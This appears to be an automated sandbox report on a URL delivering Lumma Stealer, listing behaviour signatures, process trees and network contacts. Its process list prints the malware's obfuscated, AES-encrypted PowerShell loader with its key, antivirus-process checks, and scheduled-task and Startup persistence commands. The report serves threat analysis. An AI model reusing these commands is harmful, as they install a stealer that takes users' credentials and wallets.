Analysis Overview
Threat Level: Known bad
The file https://instantinfo.shop/webdav/jreg/CONT was found to be: Known bad.
Malicious Activity Summary
Lumma Stealer
Suspicious use of NtCreateUserProcessOtherParentProcess
Blocklisted process makes network request
Downloads MZ/PE file
Checks computer location settings
Loads dropped DLL
Executes dropped EXE
Drops startup file
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of FindShellTrayWindow
Enumerates processes with tasklist
Suspicious use of SendNotifyMessage
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Modifies registry class
Opens file in notepad (likely ransom note)
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-09 09:43
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-09 09:43
Reported
2024-07-09 09:47
Platform
win10v2004-20240704-en
Max time kernel
200s
Max time network
203s
Command Line
Signatures
Lumma Stealer
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4728 created 3580 | N/A | C:\Users\Admin\AppData\Local\Temp\64684\Run.pif | C:\Windows\Explorer.EXE |
| PID 4728 created 3580 | N/A | C:\Users\Admin\AppData\Local\Temp\64684\Run.pif | C:\Windows\Explorer.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\DQETZ5NEYRS9996CDCA36DJS07.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SFTJHYUHO4CL1MMZJUD0ZK54K0.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DolphinLogix.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DolphinLogix.url | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\1ASPX.exe | N/A |
| N/A | N/A | C:\ProgramData\1ASPX.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SFTJHYUHO4CL1MMZJUD0ZK54K0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\64684\Run.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\DQETZ5NEYRS9996CDCA36DJS07.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\64684\Run.pif | N/A |
Loads dropped DLL
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1936 set thread context of 3000 | N/A | C:\ProgramData\1ASPX.exe | C:\Windows\SysWOW64\more.com |
| PID 1908 set thread context of 4880 | N/A | C:\ProgramData\1ASPX.exe | C:\Windows\SysWOW64\more.com |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\1ASPX.exe | N/A |
| N/A | N/A | C:\ProgramData\1ASPX.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\more.com | N/A |
| N/A | N/A | C:\Windows\SysWOW64\more.com | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://instantinfo.shop/webdav/jreg/CONT
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa428c46f8,0x7ffa428c4708,0x7ffa428c4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5304 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5304 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4208 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5492 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6156 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:1
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\CONT.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KdzuM($NJCgwo){return -split ($NJCgwo -replace '..', '0x$& ')};$nJRvzQn = KdzuM('59D4B57EFCB115FC66D7A806033211ADF9C76CB2046E20E58388D524E217ADBE720ACF13566AA7197EF9F70B52522CD93DFE66F26FA28816123FDC13355DE6BFED560DE32406FFAAED7A398B73C4763B86CCDD6A1A74B1813103EC5AA63A2E6EC3249655AF3DE97D0910908CAA825E17599594D262B4A64039D35F2ECE79968B4D8FAD504C59A6F6CB0A686B6BE23EAD32224675B3B0C40EB40001758F98E539659835639CCB42E0E7BF653E1F8C8F8020D573B84D9AB22D796A73712E4635298802BB049E8418807ED44CE3AE010FEB658E09EA564AE63231D950DDB50F20CB0A3295E9B45117688625FA2771BC9003AF185B321A8323F5EBDAFD517772BCB919B7C9A65209AE20AA1A9D6600617E75DE7B985392781704483491510D7A02E08FBECB86D286C60A6002E05FFD722E588EDE1DE2B37929FAE41E15D00B9A735AFFE3192F60BA58941BC0102AA6A4F0801480C8530DA1338E74A4A55FE0230424F3977BAD4C8828C61758BB76E826DF9813B9F2FA5C785BD003E8B73DB84048078167F6ADF6B13B76DD54E4454BAD1958C7087C9A9093DE83491D2F4DD774EDA0312D6386AF741590562FA26906240FE229773A6B798A3FA7C0DCE6779A7C6D4025E833DB67DBE20725CF60AF5DC170974CFD9E802C5CC8286A3672F5CDFE99622C83CA2CB622C91C0578515198F3525D2FD652A40408B9DBD71071F8AB0E73C0596C5FBE9F44A7CCA476F819D27A41E689DF14B08F243A5E50D978DEA6A1CD19B37B09AEF96AD8037119525524B259C73B3B74DD7A7B338ECCAEACF31C56AA13B8C812274EBCDE67CA90891DE23E8A27E01F55519FF128341EF2FA293C1990A43CA93852946435EF55143F4DFD67993513F589BFE597872E8ACEFC08BD2F56BF76FCE883899568DC16E39103908FB62048FAAC4AD6FE4C69F00F5C681E427678BEB563C1D5B2D3961B98188249782D4BF17E372975F5F1B158678CE45B24BCAE3546ABF30EEFF2B40C70FAD85E4608A81EBB97657FE0C0CEC592357253AEF1A4C6CEABECD495AF59F8D2C0AE1D759C6DB59AEEA0B233DCE4EEC704644465081DA9A00FF4536F4AFD1388B4BDF8649537F2AFB3357A59CA284AE88106A779F0C95F4D7B74FAFF0E60337FCF8076D3DBC4806A2EC7BF3FD210C4EFFF171E8FFEBA6330E1B008668F259FEDD9CD7757BA614E2A1F4DD4FBB235C78378969610A70DA187B06304941E6D43106ED9E1A342F84EA6D9C56B7CBEEEF5BCDF82872873B12A07387939CFFE7D495AE7592DE22CEEDFA70974DF774954A844375FB940299789F748FDCE7ECE065AB6838DF840AD24ABC46B027A1FF958A14633E8CADAE7BC065FB3C1084F3E064B54012009B86E35AE12ACF8F66E87300E0353BC5039AB303F269A1CDB1EE66F159DEBF01BB18E3A0DA0F3B125B6C6B542DA6A9DB9B77073EA54CE25870DBDF525DE6FC413AF5D3FED1B14A31E7131DADD4D7FEBD66E1169B3918465AEDFA53312EB41BFF7DE8C7650BCAFA7A610121ED67AF58D99589CC4ABFC60C4F487EFFC91C6C28EB9227893BD999607E8AF5D7AA2C38DC23931377B5DA470FD490A37B50CFEE0084AC966DCEBD5E8B4EC479B6E8C3457BBC63280AE784C01A8A1878D60AE4986DE257BAE24B00C84DF217DEB58DC28B4C01AB5DC62');$IrXNN = [System.Security.Cryptography.Aes]::Create();$IrXNN.Key = KdzuM('5946774947416C527A6278784E4F764C');$IrXNN.IV = New-Object byte[] 16;$eNsiDaGZ = $IrXNN.CreateDecryptor();$qxBtKieQN = $eNsiDaGZ.TransformFinalBlock($nJRvzQn, 0, $nJRvzQn.Length);$OXqabSFMc = [System.Text.Encoding]::Utf8.GetString($qxBtKieQN);$eNsiDaGZ.Dispose();& $OXqabSFMc.Substring(0,3) $OXqabSFMc.Substring(3)
C:\ProgramData\1ASPX.exe
"C:\ProgramData\1ASPX.exe"
C:\Windows\SysWOW64\more.com
C:\Windows\SysWOW64\more.com
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5332 /prefetch:2
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\CONT.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KdzuM($NJCgwo){return -split ($NJCgwo -replace '..', '0x$& ')};$nJRvzQn = KdzuM('59D4B57EFCB115FC66D7A806033211ADF9C76CB2046E20E58388D524E217ADBE720ACF13566AA7197EF9F70B52522CD93DFE66F26FA28816123FDC13355DE6BFED560DE32406FFAAED7A398B73C4763B86CCDD6A1A74B1813103EC5AA63A2E6EC3249655AF3DE97D0910908CAA825E17599594D262B4A64039D35F2ECE79968B4D8FAD504C59A6F6CB0A686B6BE23EAD32224675B3B0C40EB40001758F98E539659835639CCB42E0E7BF653E1F8C8F8020D573B84D9AB22D796A73712E4635298802BB049E8418807ED44CE3AE010FEB658E09EA564AE63231D950DDB50F20CB0A3295E9B45117688625FA2771BC9003AF185B321A8323F5EBDAFD517772BCB919B7C9A65209AE20AA1A9D6600617E75DE7B985392781704483491510D7A02E08FBECB86D286C60A6002E05FFD722E588EDE1DE2B37929FAE41E15D00B9A735AFFE3192F60BA58941BC0102AA6A4F0801480C8530DA1338E74A4A55FE0230424F3977BAD4C8828C61758BB76E826DF9813B9F2FA5C785BD003E8B73DB84048078167F6ADF6B13B76DD54E4454BAD1958C7087C9A9093DE83491D2F4DD774EDA0312D6386AF741590562FA26906240FE229773A6B798A3FA7C0DCE6779A7C6D4025E833DB67DBE20725CF60AF5DC170974CFD9E802C5CC8286A3672F5CDFE99622C83CA2CB622C91C0578515198F3525D2FD652A40408B9DBD71071F8AB0E73C0596C5FBE9F44A7CCA476F819D27A41E689DF14B08F243A5E50D978DEA6A1CD19B37B09AEF96AD8037119525524B259C73B3B74DD7A7B338ECCAEACF31C56AA13B8C812274EBCDE67CA90891DE23E8A27E01F55519FF128341EF2FA293C1990A43CA93852946435EF55143F4DFD67993513F589BFE597872E8ACEFC08BD2F56BF76FCE883899568DC16E39103908FB62048FAAC4AD6FE4C69F00F5C681E427678BEB563C1D5B2D3961B98188249782D4BF17E372975F5F1B158678CE45B24BCAE3546ABF30EEFF2B40C70FAD85E4608A81EBB97657FE0C0CEC592357253AEF1A4C6CEABECD495AF59F8D2C0AE1D759C6DB59AEEA0B233DCE4EEC704644465081DA9A00FF4536F4AFD1388B4BDF8649537F2AFB3357A59CA284AE88106A779F0C95F4D7B74FAFF0E60337FCF8076D3DBC4806A2EC7BF3FD210C4EFFF171E8FFEBA6330E1B008668F259FEDD9CD7757BA614E2A1F4DD4FBB235C78378969610A70DA187B06304941E6D43106ED9E1A342F84EA6D9C56B7CBEEEF5BCDF82872873B12A07387939CFFE7D495AE7592DE22CEEDFA70974DF774954A844375FB940299789F748FDCE7ECE065AB6838DF840AD24ABC46B027A1FF958A14633E8CADAE7BC065FB3C1084F3E064B54012009B86E35AE12ACF8F66E87300E0353BC5039AB303F269A1CDB1EE66F159DEBF01BB18E3A0DA0F3B125B6C6B542DA6A9DB9B77073EA54CE25870DBDF525DE6FC413AF5D3FED1B14A31E7131DADD4D7FEBD66E1169B3918465AEDFA53312EB41BFF7DE8C7650BCAFA7A610121ED67AF58D99589CC4ABFC60C4F487EFFC91C6C28EB9227893BD999607E8AF5D7AA2C38DC23931377B5DA470FD490A37B50CFEE0084AC966DCEBD5E8B4EC479B6E8C3457BBC63280AE784C01A8A1878D60AE4986DE257BAE24B00C84DF217DEB58DC28B4C01AB5DC62');$IrXNN = [System.Security.Cryptography.Aes]::Create();$IrXNN.Key = KdzuM('5946774947416C527A6278784E4F764C');$IrXNN.IV = New-Object byte[] 16;$eNsiDaGZ = $IrXNN.CreateDecryptor();$qxBtKieQN = $eNsiDaGZ.TransformFinalBlock($nJRvzQn, 0, $nJRvzQn.Length);$OXqabSFMc = [System.Text.Encoding]::Utf8.GetString($qxBtKieQN);$eNsiDaGZ.Dispose();& $OXqabSFMc.Substring(0,3) $OXqabSFMc.Substring(3)
C:\ProgramData\1ASPX.exe
"C:\ProgramData\1ASPX.exe"
C:\Windows\SysWOW64\more.com
C:\Windows\SysWOW64\more.com
C:\Windows\SysWOW64\SearchIndexer.exe
C:\Windows\SysWOW64\SearchIndexer.exe
C:\Windows\SysWOW64\SearchIndexer.exe
C:\Windows\SysWOW64\SearchIndexer.exe
C:\Users\Admin\AppData\Local\Temp\SFTJHYUHO4CL1MMZJUD0ZK54K0.exe
"C:\Users\Admin\AppData\Local\Temp\SFTJHYUHO4CL1MMZJUD0ZK54K0.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k copy Pushing Pushing.cmd & Pushing.cmd & exit
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 64684
C:\Windows\SysWOW64\findstr.exe
findstr /V "houseslegislationcivilianscientific" Corners
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Refresh + Host + Exists + Homeland + Wayne + Might 64684\x
C:\Users\Admin\AppData\Local\Temp\64684\Run.pif
64684\Run.pif 64684\x
C:\Windows\SysWOW64\timeout.exe
timeout 5
C:\Windows\SysWOW64\cmd.exe
cmd /c schtasks.exe /create /tn "Pt" /tr "wscript //B 'C:\Users\Admin\AppData\Local\NeuraSoft Dynamics\DolphinLogix.js'" /sc minute /mo 5 /F
C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DolphinLogix.url" & echo URL="C:\Users\Admin\AppData\Local\NeuraSoft Dynamics\DolphinLogix.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DolphinLogix.url" & exit
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "Pt" /tr "wscript //B 'C:\Users\Admin\AppData\Local\NeuraSoft Dynamics\DolphinLogix.js'" /sc minute /mo 5 /F
C:\Users\Admin\AppData\Local\Temp\DQETZ5NEYRS9996CDCA36DJS07.exe
"C:\Users\Admin\AppData\Local\Temp\DQETZ5NEYRS9996CDCA36DJS07.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k copy Pushing Pushing.cmd & Pushing.cmd & exit
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 64684
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Refresh + Host + Exists + Homeland + Wayne + Might 64684\x
C:\Users\Admin\AppData\Local\Temp\64684\Run.pif
64684\Run.pif 64684\x
C:\Windows\SysWOW64\timeout.exe
timeout 5
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\CONT.hta
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | instantinfo.shop | udp |
| US | 172.67.170.122:443 | instantinfo.shop | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 122.170.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
